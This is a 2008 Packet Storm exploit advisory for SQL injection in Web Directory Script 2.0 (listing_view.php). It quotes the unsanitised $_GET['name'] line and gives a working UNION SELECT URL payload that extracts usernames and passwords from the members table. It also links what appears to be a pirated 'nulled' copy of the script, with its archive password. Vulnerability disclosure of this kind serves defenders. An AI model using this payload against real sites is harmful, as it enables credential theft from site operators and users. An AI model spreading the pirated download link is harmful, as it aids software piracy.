wds-sql.txt

🗓️ 26 Aug 2008 00:00:00Reported by ~!Dok_tOR!~Type

packetstorm🔗 packetstormsecurity.com👁 22 Views

Web Directory Script <= 2.0 SQL Injection Vulnerability, listing_view.php, magic_quotes_gpc = Of

`Web Directory Script <= 2.0 SQL Injection Vulnerability  
  
Author: ~!Dok_tOR!~  
Contact: coder5(at)topmail.kz   
Home Page: www.antichat.ru  
Date found: 23.08.08  
Product: Web Directory Script  
Version: 2.0  
Download script: http://rapidshare.com/files/121448809/W3bDirScr2-nullscript.net.rar  
Password: nullscript.net  
Vulnerability Class: SQL Injection  
  
listing_view.php  
  
Vuln code:  
  
$friendly_url=$_GET['name'];  
  
http://localhost/[installdir]/  
  
magic_quotes_gpc = Off  
  
Exploit:  
  
listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*  
  
Thanks: Zitt, rijy, Koller, NOmeR1, $n@]<e, n0ne, +toxa+, [cash], ettee, HiM@S and All members of antichat.ru and xaker.name .  
  
`

26 Aug 2008 00:00Current

7.4High risk

Vulners AI Score7.4